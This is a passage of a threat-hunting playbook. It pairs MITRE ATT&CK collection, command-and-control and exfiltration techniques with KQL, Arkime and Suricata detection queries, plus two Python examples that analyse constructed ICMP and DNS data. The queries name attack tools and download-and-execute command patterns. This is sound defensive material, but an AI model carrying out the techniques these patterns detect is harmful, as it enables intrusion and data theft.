alert smb any any -> any any (msg:"SMB File Exfiltration Detected - PDF"; flow:established; fileext:"pdf"; sid:1000001; rev:1;)
alert smb any any -> any any (msg:"SMB File Exfiltration Detected - Office document"; flow:established; filemagic:"Microsoft"; sid:1000002; rev:1;)
[KQL] T1213.002 SharePoint — audit log events (requires LOGbinder or similar)
event.code: (13 OR 14)    -- document checked out/in
event.code: (47 OR 48 OR 49 OR 50)   -- document/list viewed
event.code: (15 OR 19 OR 39)    -- object deleted/restored
event.code: (11 OR 12 OR 20 OR 25 OR 26 OR 27 OR 28 OR 29)   -- user/permission edits
T1560

Archive Collected Data

[MITRE]
[KQL] WinRAR or 7z creating encrypted archives (pre-exfiltration staging)
event.type: ("start" OR "process_started") AND (((process.name: "rar.exe" OR process.pe.original_file_name: "Command line RAR") AND process.args: "a" AND process.args: ("-hp*" OR "-p*" OR "-dw" OR "-tb" OR "-ta" OR "/hp*" OR "/p*")) OR (process.pe.original_file_name: ("7z.exe" OR "7za.exe") AND process.args: "a" AND process.args: ("-p*" OR "-sdel")))
[KQL] T1560.001 Archive via Utility — all common archivers
event.category: process_creation AND process.name: (7z.exe OR 7za.exe OR winzip.exe OR winzip64.exe OR rar.exe OR winrar.exe)
process.name: powershell.exe AND process.command_line: *Compress-Archive*
process.name: 7z*.exe AND process.command_line: *-p *   -- password-protected archive
[KQL] Compressed file creation/modification events
file.name: (*.zip OR *.7z OR *.rar OR *.gzip OR *.tar) AND event.type: creation
(event.type: "file_created" OR event.type: "file_modified") AND file.extension: ("zip" OR "rar" OR "7z")
T1114.001

Email Collection: Local Email Collection

[MITRE]
Adversaries access locally stored email files (OST/PST) to steal email contents without network access to the mail server.
[KQL] Process command line referencing .ost or .pst email archive files
process.command_line: (*.ost* OR *.pst*)
T1114.002

Email Collection: Remote Email Collection

[MITRE]
Adversaries access email from remote mail servers using legitimate APIs or protocols (Exchange, Office 365). PowerShell New-MailboxExportRequest is commonly abused on Exchange.
[KQL] PowerShell New-MailboxExportRequest — exports entire Exchange mailbox
process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND process.args: *New-MailboxExportRequest*
T1213.002

Data from Information Repositories: SharePoint

[MITRE]
Adversaries collect sensitive data from SharePoint collaboration repositories. Requires SharePoint audit logs enabled and fed into Elastic (e.g., via LOGbinder).
[KQL] SharePoint document check-out/in and view events (via LOGbinder audit codes)
-- Document checked out/in:
event.code: (13 OR 14)
-- Document/list viewed:
event.code: (47 OR 48 OR 49 OR 50)
-- Objects deleted/restored:
event.code: (15 OR 19 OR 39)
-- User and permission changes:
event.code: (11 OR 12 OR 20 OR 25 OR 26 OR 27 OR 28 OR 29 OR 30 OR 31 OR 32 OR 33 OR 34 OR 35 OR 36 OR 37 OR 38)
T1560.001

Archive Collected Data: Archive via Utility

[MITRE]
Adversaries use standard archive utilities (7zip, WinRAR, WinZip) to compress and optionally encrypt collected data prior to exfiltration.
[KQL] Archive utility process creation — 7z, WinRAR, WinZip
event.category: process_creation AND process.name: (7z.exe OR 7za.exe OR winzip.exe OR winzip64.exe OR rar.exe OR winrar.exe)
process.name: 7z*.exe AND process.command_line: *-p *
process.name: winzip*.exe AND process.command_line: *-s *
process.name: rar.exe AND process.command_line: *-hp*
[KQL] PowerShell Compress-Archive usage
process.name: powershell.exe AND process.command_line: *Compress-Archive*
[KQL] Archive file creation event
file.name: (*.zip OR *.gzip OR *.tar OR *.7z OR *.rar) AND event.type: creation
T1560.003

Archive Collected Data: Archive via Custom Method

[MITRE]
Adversaries write custom code to compress/encrypt data prior to exfiltration, avoiding standard archive tool signatures. Look for RAR/7zip with custom passwords or archive deletion flags.
[KQL] RAR or 7zip with password and delete-after-archive flags (custom staging)
event.type: ("start" OR "process_started") AND (
  (process.name: "rar.exe" AND process.args: "a" AND process.args: ("-hp*" OR "-p*" OR "-dw" OR "-tb" OR "-ta")) OR
  (process.pe.original_file_name: ("7z.exe" OR "7za.exe") AND process.args: "a" AND process.args: ("-p*" OR "-sdel"))
)
[KQL] Archive file creation — any compressed file extension
file.name: (*.zip OR *.7z OR *.rar OR *.gzip) AND event.type: creation
T1557

Adversary-in-the-Middle

[MITRE]
Adversaries position themselves between two hosts via ARP spoofing or rogue DHCP to silently capture sensitive data, intellectual property, or proprietary communications as they flow across the network. Also appears in Credential Access.
[KQL] ARP spoofing / network redirection tools executing on endpoints
process.name: ("arpspoof" OR "ettercap" OR "bettercap" OR "mitmproxy") AND NOT user.name: "root"
[Arkime] ARP Poisoning — multiple MACs claiming same IP (default gateway)
protocols == arp && arp.opcode == 2
T1185

Browser Session Hijacking

[MITRE]
Adversaries hijack active, already-authenticated browser sessions to access internal CRM portals, O365, or financial software — bypassing authentication and MFA by riding the existing browser process.
[KQL] Browser launched with debugging port open — adversary can interact with live session via API
process.name: ("chrome.exe" OR "msedge.exe") AND process.command_line: "*--remote-debugging-port=*"
T1530

Data from Cloud Storage

[MITRE]
Adversaries target cloud-hosted data (AWS S3, Azure Blob, GCP Cloud Storage) via massive volumes of GetObject or Sync API calls — datasets that can include full database backups and data lake exports.
[KQL] Mass extraction of S3 objects — often indicates syncing an entire bucket externally (ES|QL: KQL has no aggregation pipeline)
FROM logs-* | WHERE event.dataset == "aws.cloudtrail" AND event.provider == "s3.amazonaws.com" AND event.action == "GetObject" | STATS get_count = COUNT(*) BY user.name | WHERE get_count > 1000
T1602

Data from Configuration Repository

[MITRE]
Adversaries search source code repositories (GitHub, GitLab, Bitbucket) or network configuration systems (SolarWinds, Ansible) for hardcoded API keys, passwords, database connection strings, or proprietary source code.
[KQL] Mass repository cloning/download activity by a single user or service account (ES|QL: KQL has no aggregation pipeline)
FROM logs-* | WHERE event.dataset IN ("github.audit", "gitlab.audit") AND event.action IN ("git.clone", "repository.download") | STATS clone_count = COUNT(*) BY user.name | WHERE clone_count > 10
[Arkime] Large SSH/HTTPS transfers from internal Git servers to non-developer endpoints
ip.src == [Git_Server_IP] && bytes > 10000000
T1056

Input Capture

[MITRE]
Beyond stealing passwords, keyloggers capture drafted emails, proprietary code written in IDEs, Slack/Teams chat messages, and search queries — providing massive situational context. Also appears in Credential Access.
[KQL] Keyloggers dropping output files to temp directories (updated continuously as user types)
winlog.event_id: 11 AND file.path: ("*\\Temp\\*.log" OR "*\\AppData\\Local\\Temp\\*.txt") AND process.executable: ("*\\Temp\\*.exe" OR "*\\AppData\\Local\\Temp\\*.exe")
T1125

Video Capture

[MITRE]
Highly targeted adversaries (corporate espionage, extortion) capture live webcam video to surveil the user, their surroundings, and anyone they speak with — using Windows Camera APIs (Media Foundation) or /dev/video on Linux.
[KQL] Untrusted apps receiving webcam consent via registry (Sysmon Event ID 12/13)
winlog.event_id: (12 OR 13) AND registry.path: "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\*"
[KQL] Linux: tools interacting with video capture devices
process.name: ("ffmpeg" OR "vlc" OR "mpv") AND process.command_line: "*/dev/video*" AND NOT user.name: "root"

Command & Control TA0011

Adversaries use command and control (C2) communications to hide their activity and blend in with legitimate traffic. Techniques range from using standard protocols (HTTP, DNS, SMTP) to custom encryption and obfuscation.

T1001

Data Obfuscation

[MITRE]
Adversaries obfuscate C2 traffic by adding junk data, using steganography, or impersonating legitimate protocols to make content harder to detect or decode.
[KQL] Suspicious POST requests (SLOTHFULMEDIA uses POST for C2)
http.request.method: POST
[KQL] PowerShell/cmd using base64 or encoded commands
process.name: (powershell.exe OR cmd.exe) AND process.command_line: *base64*
process.name: powershell.exe AND process.command_line: (*-e* OR *-enc*)
[Arkime] High-entropy HTTP (entropy 6-8) — obfuscated C2 data
http.method == [GET,POST] && http.statuscode == 200 && entropy.http==[6,7,8] && ip.dst != [<private IPs>]
http.method == [GET,POST] && http.statuscode == 200 && http.content-type == application/x-www-form-urlencoded
T1001.002

Steganography

[MITRE]
Adversaries hide C2 data in digital messages (images, PDFs, documents). Difficult to detect at scale — focus on specific suspicious hosts. IOCs of known C2 domains or IPs help corroborate findings.
[Arkime] High-entropy HTTP with URI and hostname present — potential steganography carrier files
protocols == http && http.uri == EXISTS! && http.host == EXISTS! && http.method == [GET,POST] && http.statuscode == 200 && entropy.http == [6,7,8]
[Info] Analyst note
-- Focus on specific suspicious hosts rather than bulk scanning
-- Use CyberChef to identify encoded content in libfile-parsed file transfers
-- Correlate with known C2 domain/IP IOCs to corroborate findings
T1008

Fallback Channels

[MITRE]
Adversaries configure backup C2 channels used if the primary is disrupted. Tools like PlugX, Cobalt Strike, and Empire support multiple fallback channels using SSL tunneling or HTTP persistence flags.
[KQL] Process args indicating C2 tunneling/fallback flags
process.command_line: (*-SSL* OR *-Si* OR *-Sp* OR *-Up* OR *-Pi* OR *-Pp* OR *-HTTP*)
-- -SSL: TLS tunneling  -Si: C2 IP  -Sp: C2 port  -Up: C2 UDP port
-- -Pi: proxy IP  -Pp: proxy port  -HTTP: HTTP persistent connection
[Info] Network detection approach
-- Look for client sending significantly more data than it receives (upload-heavy)
-- Processes with unexpected external network connections
-- Packet contents not matching expected protocol behavior for the port used
T1071

Application Layer Protocol

[MITRE]
Adversaries abuse standard application-layer protocols (IRC, Telnet, RDP, Stratum) to blend C2 traffic with legitimate network activity.
[Arkime] IRC traffic (common malware C2 channel)
protocols == irc || port == [194,6667]
[Arkime] Telnet traffic — suspicious on modern networks
protocols == telnet || port == 23
[Arkime] Stratum protocol — cryptojacking C2 (Lucifer malware uses port 10001)
protocols == stratum || port == 10001
[Arkime] RDP on non-standard port (NETEAGLE uses TCP/7519)
protocols == rdp || port == 7519
T1071.001

Web Protocols (HTTP/S)

[MITRE]
Adversaries use HTTP and HTTPS for C2 traffic to blend with normal web browsing. Look for suspicious user-agents, unusual TLS certificates, and HTTP POST to unknown external destinations.
[KQL] PowerShell beaconing with suspicious user-agents
process.name: powershell.exe AND process.command_line: *Invoke-WebRequest* AND process.command_line: (*HttpBrowser* OR *Wget* OR *Opera*)
[KQL] Curl beaconing with suspicious user-agents
process.name: curl.exe AND process.command_line: *-s* AND process.command_line: *-A* AND process.command_line: (*HttpBrowser* OR *Wget* OR *Opera*)
[KQL] Known malicious TLS certificate hashes (update with threat intel)
event.category:(network or network_traffic) AND (
  tls.server.hash.md5:950098276A495286EB2A2556FBAB6D83 OR
  tls.server.hash.sha1:6ECE5ECE4192683D2D84E25B0BA7E04F9CB7EB7C OR
  tls.server.hash.sha256:87F2085C32B6A2CC709B365F55873E207A9CAA10BFFECF2FD16D3CF9D94D390C
)
[Arkime] HTTP POST to external; TLS JA3 fingerprinting
http.method==POST && host.http==EXISTS!
tls.ja3 ==EXISTS!
T1071.002

File Transfer Protocols (FTP/SMB)

[MITRE]
Adversaries use FTP, FTPS, TFTP, or SMB as C2 channels. Verify authorized users and expected endpoints. External SMB connections are particularly suspicious.
[Arkime] FTP/FTPS/TFTP traffic — verify authorized users
protocols == ftp || protocols == ftps || protocols == tftp
port == [20,21,990,989,69]
[Arkime] SMB traffic — flag external SMB connections
protocols == smb || port == [445,137,138,139]
T1071.003

Mail Protocols (SMTP/IMAP)

[MITRE]
Adversaries use email protocols (SMTP, IMAP, POP3) for C2 — commands sent as email messages. Look for unusual SMTP traffic, especially from non-mail servers.
[Arkime] SMTP/SMTPS/POP3/IMAP traffic on expected ports
protocols == smtp || protocols == smtps || protocols == pop3 || protocols == imap
port == [143,993,110,995,25,465]
[KQL] HTTP to bare IP address on common ports (C2 masquerading as mail)
event.category:(network OR network_traffic) AND network.protocol:http AND network.transport:tcp AND url.full:/http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/cd/ AND destination.port:(53 OR 80 OR 8080 OR 443)
[Arkime] Sessions with email attachment filename fields present
email.fn == EXISTS!
T1071.004

DNS

[MITRE]
Adversaries use DNS for C2 — encoding data in DNS queries/responses (DNS tunneling). A high volume of NXDOMAIN responses can indicate malware beaconing to DGA-generated domains.
[KQL] nslookup with query type args — potential DNS tunneling
event.category:process AND event.type:start AND process.name:nslookup.exe AND process.args:(-querytype=* OR -qt=* OR -q=* OR -type=*)
[Info] DNS tunneling visualization using Kibana + Zeek
-- Create Kibana vertical bar graph:
--   Filter: event.module:"zeek" AND fileset.name:"dns"
--   Y-axis: Unique Count of dns.question.name
--   X-axis: Term aggregation on source.ip
-- Hosts with far more unique DNS queries than peers are suspicious
-- High NXDOMAIN rate = possible DGA malware C2 beaconing
T1090

Proxy

[MITRE]
Adversaries use proxies (SOCKS, HTTP) to route C2 traffic through intermediary systems, obscuring the true origin or destination.
[Arkime] SOCKS proxy traffic
protocols == socks
port == 5090
T1090.002

External Proxy (P2P/Tor)

[MITRE]
Adversaries route C2 through Tor or peer-to-peer applications. P2P clients are policy violations and indicators of compromise on managed networks.
[KQL] Known P2P / torrent client process names
process.name: (amule.exe OR ares.exe OR azureus.exe OR bearshare.exe OR bitcomet.exe OR bitlord.exe OR bittorrent.exe OR deluge.exe OR frostwire.exe OR limewire.exe OR mlnet.exe OR overnet.exe OR popcorn-time.exe OR pplive.exe OR qtorrent.exe OR tribler.exe OR tvants.exe OR utorrent.exe OR vuze.exe OR zultrax.exe) OR process.name: *torrent*
T1090.003

Multi-hop Proxy

[MITRE]
Adversaries chain multiple proxies (Tor onion routing) to obscure C2 traffic origin. Obtain authoritative list of approved VPN servers from network team to baseline against.
[KQL] Tor client process execution
process.name: tor.exe
[Info] Detection approach
-- Request list of authorized VPN servers from network team
-- Analyze VPN and ICMP traffic for anomalies
-- Obtain Tor exit/guard node IP lists from threat intel feeds
T1092

Communication through Removable Media

[MITRE]
Adversaries on air-gapped networks use removable media as a C2 channel — writing commands to USB and reading responses from infected hosts. Monitor file access on removable media and auto-run processes.
[KQL] New external device recognized; object access on removable media
event.code: (6416 OR 4663)
-- 6416: New external device recognized  4663: Object access performed
[KQL] Process created from non-standard drive letter (check command line for removable drive letter)
event.code: 4688 AND NOT winlog.event_data.NewProcessName: ("C:\\*" OR "D:\\*")
T1095

Non-Application Layer Protocol (ICMP)

[MITRE]
Adversaries tunnel C2 data inside ICMP echo requests/responses. Normal ICMP pings have small payloads (~32 bytes); payloads >200 bytes are suspicious.
[Arkime] ICMP echo request/response — filter for packets >200 bytes payload
ip.protocol == icmp && icmp.type == [0,8]
-- Add bytes filter for packets >200 bytes
-- icmp.request.code  icmp.response.code
[KQL] ICMP via Zeek — echo type 0/8
network.transport: icmp AND zeek.connection.icmp.type: (0 OR 8)
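Neither query on this card expresses the payload-size condition, so here is the check done directly on packet bytes. This is an added example, not part of the playbook: it parses constructed IPv4/ICMP echo packets (built inline by build_icmp_echo, checksums left zero) and flags any echo whose payload exceeds the card's 200-byte threshold.

```python
"""Added example (not the playbook's own code): the ICMP payload-size hunt
from the T1095 card applied to raw IPv4/ICMP bytes. The packets below are
constructed test input; the 200-byte threshold is the one the card states."""
import struct

ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST = 0, 8


def build_icmp_echo(payload: bytes, icmp_type: int = ICMP_ECHO_REQUEST) -> bytes:
    """Constructed IPv4 packet carrying an ICMP echo with the given payload
    (checksums are left zero; this is sample data for parsing, not for sending)."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, 0x1234, 1) + payload
    total_len = 20 + len(icmp)
    ipv4 = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 1, 0,
                       bytes([10, 0, 0, 9]), bytes([203, 0, 113, 7]))
    return ipv4 + icmp


def icmp_payload_len(packet: bytes):
    """Return (icmp_type, payload_bytes) for an IPv4 ICMP echo request/reply,
    or None if the packet is something else or truncated."""
    if len(packet) < 20:
        return None
    version_ihl, _, total_len, _, _, _, proto = struct.unpack("!BBHHHBB", packet[:10])
    if version_ihl >> 4 != 4 or proto != 1:       # not IPv4, or not ICMP
        return None
    ihl = (version_ihl & 0x0F) * 4                 # IPv4 header length in bytes
    if ihl < 20 or len(packet) < ihl + 8:
        return None
    icmp_type = packet[ihl]
    if icmp_type not in (ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST):
        return None
    # ICMP echo header is 8 bytes (type, code, checksum, id, seq); the rest is payload.
    end = min(len(packet), total_len)
    return icmp_type, end - ihl - 8


def oversized_echo(packets, threshold: int = 200) -> list:
    """Indexes of packets whose echo payload is larger than threshold bytes."""
    hits = []
    for i, pkt in enumerate(packets):
        parsed = icmp_payload_len(pkt)
        if parsed and parsed[1] > threshold:
            hits.append(i)
    return hits


# Constructed sample: two ordinary pings and one echo reply carrying 300 bytes.
SAMPLE_PACKETS = [
    build_icmp_echo(bytes(range(0x61, 0x61 + 26)) + b"abcdef"),   # 32-byte payload (Windows ping)
    build_icmp_echo(b"\x00" * 56),                                 # 56-byte payload (Linux ping)
    build_icmp_echo(b"TUNNEL-DATA-" * 25, ICMP_ECHO_REPLY),        # 300-byte payload
    b"\x45\x00" + b"\x00" * 18 + b"\x00" * 8,                      # IPv4, protocol 0: ignored
]

if __name__ == "__main__":
    for i, pkt in enumerate(SAMPLE_PACKETS):
        print(i, icmp_payload_len(pkt))
    print("oversized:", oversized_echo(SAMPLE_PACKETS))
```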
T1102

Web Service (Legitimate Cloud Abuse)

[MITRE]
Adversaries abuse legitimate cloud services (GitHub, Pastebin, Google Drive, OneDrive, Slack, ngrok) as C2 to blend with allowed traffic and avoid domain-based detection.
[KQL] DNS queries to known-abused cloud/paste/tunnel services from non-browser processes
network.protocol: dns AND NOT user.id: ("S-1-5-18" OR "S-1-5-19" OR "S-1-5-20") AND dns.question.name: (
  "raw.githubusercontent.*" OR "*.pastebin.*" OR "*drive.google.*" OR
  "*api.dropboxapi.*" OR "*dropboxusercontent.*" OR "*onedrive.*" OR
  "*slack-files.com" OR "*ghostbin.*" OR "*ngrok.*" OR "*portmap.*" OR
  "*serveo.net" OR "*localtunnel.me" OR "*pagekite.me" OR "*localxpose.io" OR
  "*notabug.org" OR "rawcdn.githack.*" OR "paste.nrecom.net" OR
  "zerobin.net" OR "controlc.com" OR "requestbin.net"
) AND NOT process.executable: (
  "?:\\Program Files\\*.exe" OR "?:\\Program Files (x86)\\*.exe" OR
  "?:\\Users\\*\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" OR
  "?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
)
T1105

Ingress Tool Transfer

[MITRE]
Adversaries download tools and payloads using built-in utilities: PowerShell, certutil, BITSAdmin, curl, wget. These LOLBins bypass application whitelisting and leave predictable command-line patterns.
[KQL] PowerShell downloading/executing remote content
process.name: powershell.exe AND process.command_line: (*downloadstring* OR *downloaddata* OR *downloadfile* OR *iex* OR *.invoke* OR *invoke-expression* OR *Invoke-WebRequest*)
[KQL] Certutil downloading malicious binaries
process.name: certutil.exe AND process.command_line: (*urlcache* AND *split*)
[KQL] BITSAdmin downloading files
process.name: bitsadmin.exe AND process.command_line: (*download* OR *transfer*)
[KQL] CertReq HTTP POST abuse for file transfer
event.type: "start" AND (process.name: "CertReq.exe" OR process.pe.original_file_name: "CertReq.exe") AND process.args: "-Post"
[KQL] desktopimgdownldr used to download arbitrary files
event.type: "start" AND (process.name: "desktopimgdownldr.exe" OR process.pe.original_file_name: "desktopimgdownldr.exe") AND process.args: "/lockscreenurl:http*"
[KQL] cmd.exe making external network connections
event.category:network AND event.type:connection AND process.name:cmd.exe AND NOT destination.ip:(10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
[KQL] Sysmon Ev3/Ev11: Network connection or file creation by LOLBin download tools
event.code: (3 OR 11) AND process.executable: (*bitsadmin.exe OR *rsync.exe OR *scp.exe OR *sftp.exe OR *certutil.exe OR *nc.exe OR *MpCmdRun.exe)
T1132.001

Standard Encoding

[MITRE]
Adversaries encode C2 data using standard schemes (Base64, XOR, compression) to obfuscate command content in transit. Certutil is commonly abused for encode/decode operations.
[KQL] Certutil used for encoding/decoding data
process.name: certutil.exe AND process.command_line: (*-encode* OR *-decode*)
[KQL] Base64/XOR in command line; compression tool execution
process.command_line: *base64*
process.command_line: *bxor*
process.name: (winzip.exe OR winrar.exe OR 7z.exe OR peazip.exe)
[KQL] PowerShell bitwise operators (encoding/XOR operations)
process.name: powershell.exe AND process.command_line: (*-band* OR *-bor* OR *-bxor* OR *-bnot* OR *-shl* OR *-shr*)
T1568.002

Domain Generation Algorithm (DGA)

[MITRE]
Malware uses DGA to generate many pseudo-random domain names for C2, making blocklisting ineffective. Detection: entropy analysis, Markov chains, NXDOMAIN volume, recently registered domains.
[KQL] TLS/HTTP traffic matching known stage DGA domain pattern
event.category:(network OR network_traffic) AND type:(tls OR http) AND network.transport:tcp AND destination.domain: /[a-z]{3}\.stage\.[0-9]{8}\..*/
[Info] DGA detection approaches
-- CDN domains may trigger DGA detections due to similar naming patterns
-- Check for recently registered domains (WHOIS age < 30 days)
-- Look for high NXDOMAIN rates from single hosts
-- Use entropy/frequency analysis on dns.question.name in Kibana
T1571

Non-Standard Port

[MITRE]
Adversaries communicate using protocols on non-standard ports (e.g., SSH on 2222, HTTP on 8443) to evade port-based firewall rules and detection signatures.
[KQL] SSH connections on non-standard port (should be 22)
process.name: ssh AND event.action: (connection_attempted OR connection_accepted) AND NOT destination.port: 22
[KQL] SSH exec action (non-interactive C2 command execution)
event.action: exec AND process.name: ssh
T1572

Protocol Tunneling

[MITRE]
Adversaries tunnel protocols inside others (DNS-over-HTTPS, SSH tunneling, port forwarding) to bypass network controls. PortProxy registry keys are a reliable indicator of port forwarding setup.
[KQL] New PortProxy port forwarding rule in registry (FP: legitimate net admin)
registry.path: ("HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*" OR "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*")
T1573.001

Symmetric Cryptography

[MITRE]
Adversaries encrypt C2 channels using symmetric algorithms (AES, DES, 3DES, Blowfish, RC4). Some backdoors (Zebrocy, APT28) use these with recognizable command-line signatures.
[KQL] Sysmon Ev1: Zebrocy/APT28 backdoor command patterns
event.code: 1 AND process.command_line: (*screenshot* OR *Sys_info* OR *Get-Network* OR *Scan_all*)
[Arkime] Encrypted channels using TLS ciphers to external IPs
tls.cipher == EXISTS! && ip.dst != [<private IPs>]
[KQL] TLS cipher present on connections to external IPs
tls.cipher: * AND NOT destination.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
T1573.002

Asymmetric Cryptography

[MITRE]
Adversaries use RSA/ECC for C2 channel encryption. Self-signed TLS certificates are a strong indicator — legitimate servers use CA-signed certificates with valid trust chains.
[Suricata] TLS Server Hello sent by the server (handshake record, type byte 0x02 at offset 5) — an encrypted channel being established
alert tcp any any -> any any (msg:"Asymmetric Cryptography Traffic Detected (SSL/TLS)"; flow:established,from_server; content:"|16 03|"; depth:2; content:"|02|"; distance:3; within:1; sid:1000005; rev:1;)
[Suricata] Self-signed certificate — a rule cannot compare subject to issuer, so match a known self-signed issuer string in the issuer buffer and corroborate with the KQL below
alert tls any any -> any any (msg:"Self-Signed Certificate Detected"; flow:established,from_server; tls.cert_issuer; content:"<self-signed issuer CN>"; nocase; sid:1000006; rev:1;)
[KQL] Self-signed certificates: both subject and authority key identifiers null
subject_key_identifier: null AND extensions.authority_key_identifier: null
T1659

Content Injection

[MITRE]
Adversaries inject malicious C2 code into legitimate, trusted websites so the firewall sees traffic to a reputable domain and allows it. The infected host beacons out to a hijacked trusted site instead of an evil domain. Also in Initial Access.
[KQL] Repetitive outbound HTTP 200 responses with tiny payload — C2 heartbeat pattern (ES|QL: KQL has no aggregation pipeline)
FROM logs-* | WHERE network.direction == "outbound" AND http.response.status_code == 200 AND http.response.bytes < 500 | STATS hits = COUNT(*) BY url.original | WHERE hits > 1000
T1665

Hide Infrastructure

[MITRE]
Domain Fronting routes C2 traffic through CDNs (Cloudflare, Fastly, Azure) so the firewall sees connections to trusted IPs while the true C2 destination is hidden inside the encrypted HTTP Host header — invisible without TLS inspection.
[KQL] Domain Fronting — TLS SNI does not match HTTP Host header (requires SSL inspection proxy)
event.dataset: "proxy" AND tls.client.server_name: ("*google.com*" OR "*cloudfront.net*") AND NOT http.request.headers.host: ("*google.com*" OR "*cloudfront.net*")
[Info] Without SSL decryption the HTTP Host is invisible — hunt via anomalous data volumes to CDN IPs
Without SSL decryption the HTTP Host header is invisible. Hunt for endpoints sending large sustained data transfers to CDN IP ranges that don't match normal baseline web browsing.
T1104

Multi-Stage Channels

[MITRE]
A tiny "stager" payload makes a brief network connection, downloads a fully featured C2 agent directly into memory, and hands over execution — minimizing the footprint of the initial infection and evading file-based AV detection.
[KQL] Staging sequence: process makes network connection then immediately injects into another process (CreateRemoteThread — Event ID 8)
winlog.event_id: 8 AND process.parent.name: ("powershell.exe" OR "cmd.exe" OR "wscript.exe")
-- Correlate injection timestamp with preceding outbound connections (Event ID 3)
T1219

Remote Access Tools

[MITRE]
Adversaries install legitimate commercial RMM tools (AnyDesk, TeamViewer, ConnectWise, Atera) that AV completely ignores and firewalls allow through — providing a persistent, low-noise C2 channel disguised as IT support software.
[KQL] Execution of unauthorized commercial remote access tools on endpoints
process.name: ("AnyDesk.exe" OR "TeamViewer_Service.exe" OR "screenconnect.exe" OR "AteraAgent.exe" OR "meshagent.exe")
[Arkime] DNS queries to commercial RMM infrastructure from standard user workstations
dns.host == /.*(anydesk|teamviewer|screenconnect|logmein|atera)\.com/
T1205

Traffic Signaling

[MITRE]
Port Knocking — malware stays completely dormant until the adversary sends a specific sequence of connection attempts to closed ports (e.g., TCP 7000→8000→9000). Only then does it wake up and establish a C2 connection. Also in Defense Evasion.
[KQL] Port Knocking — single external IP hitting multiple closed ports in rapid succession (ES|QL: KQL has no aggregation pipeline)
FROM logs-* | WHERE event.action == "deny" AND network.transport == "tcp" | STATS ports_hit = COUNT_DISTINCT(destination.port) BY source.ip | WHERE ports_hit > 3

Exfiltration TA0010

Adversaries steal data by transferring it to adversary-controlled systems. Techniques include exfiltrating over the existing C2 channel, using alternative protocols, or physically transferring data via removable media.

T1041

Exfiltration Over C2 Channel

[MITRE]
Adversaries exfiltrate data over the same channel used for C2, avoiding the need for a separate exfiltration channel. Look for archive files being downloaded or POSTed over HTTP/S.
[KQL] Archive file download via C2 channel (staged collection being pulled out)
http.request.body.content: *download* AND http.request.body.content: (*.zip OR *.rar OR *.7z OR *.gz OR *.tar OR *.bz2 OR *.xz OR *.lzma OR *.lz4 OR *.zst)
[KQL] HTTP POST with archive file extension in URL/body (upload to C2)
http.request.method: POST AND url.original: (*.zip OR *.rar OR *.7z OR *.gz OR *.tar OR *.bz2 OR *.xz OR *.lzma OR *.lz4 OR *.zst)
T1048

Exfiltration Over Alternative Protocol

[MITRE]
Adversaries exfiltrate data using a protocol different from the C2 channel (FTP, DNS, SMTP, SMB). This separates exfiltration traffic from C2 traffic to complicate detection.
[KQL] SMTP traffic on port 26 (non-standard, often used to bypass mail filters)
event.category:(network OR network_traffic) AND network.transport:tcp AND (destination.port:26 OR (event.dataset:zeek.smtp AND destination.port:26))
[Arkime] Alternative protocol traffic — FTP, SMTP, HTTPS, DNS, SMB (especially to external IPs)
protocols == [ftp,smtp,https,dns,smb]
[KQL] Rare internet SMB connections (SMB to external IPs is almost always malicious)
network.transport:tcp AND destination.port:(139 OR 445) AND NOT destination.ip:(10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
[Arkime] Outbound FTP with STOR command (file upload to adversary FTP server)
protocols == ftp
-- Search session content for "STOR" command (file upload)
[Arkime] Outbound HTTP POST (exfiltration upload)
protocols == http && http.method == POST
[Info] DNS exfiltration detection — high unique DNS query volume
-- Create Kibana visualization:
--   Filter: event.module:"zeek" AND fileset.name:"dns"
--   Y-axis: Unique Count of dns.question.name
--   X-axis: Term aggregation on source.ip
-- Hosts with abnormally high unique DNS query counts may be exfiltrating via DNS
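The Kibana visualization above, the identical one on the T1071.004 DNS card, and the entropy/NXDOMAIN heuristics on the T1568.002 DGA card all reduce to three per-host numbers. As an added example that is not part of the playbook, the script below computes them offline over constructed Zeek-style dns.log lines (Zeek's own field names id.orig_h, query and rcode_name are assumed; the thresholds are illustrative).

```python
"""Added example (not the playbook's own code): the DNS hunts from the
T1071.004 DNS card, the T1568.002 DGA card and the T1048 DNS-exfiltration
note, run offline over constructed Zeek-style dns.log lines (JSON, one per
line). Field names follow Zeek's dns.log; thresholds are illustrative."""
import json
import math
from collections import Counter, defaultdict

# Constructed sample: 10.0.0.5 behaves like a normal workstation; 10.0.0.9
# resolves many unique, high-entropy names and mostly gets NXDOMAIN back,
# the pattern the cards describe for DGA beaconing or DNS tunnelling.
NORMAL_QUERIES = ["www.example.com", "mail.example.com", "www.example.com",
                  "update.microsoft.com", "login.live.com"]
RANDOM_LABELS = ["x7k2q9zv1m4p", "a1b9c3d7e5f2", "q8w2e4r6t1y3", "zx9cv7bn5ml3",
                 "p0o9i8u7y6t5", "lk3jh5gf7ds9", "mn4bv6cx8zq1", "wq2er4ty6ui8"]
SAMPLE_DNS_LOG = "\n".join(
    [json.dumps({"id.orig_h": "10.0.0.5", "query": q, "rcode_name": "NOERROR"})
     for q in NORMAL_QUERIES]
    + [json.dumps({"id.orig_h": "10.0.0.9", "query": f"{label}.evil-example.net",
                   "rcode_name": "NXDOMAIN" if i % 4 else "NOERROR"})
       for i, label in enumerate(RANDOM_LABELS)]
)


def shannon_entropy(text: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def name_entropy(qname: str) -> float:
    """Entropy of the most random label below the TLD. DGA randomness sits in
    the registrable label, tunnelling randomness in the leftmost one, so the
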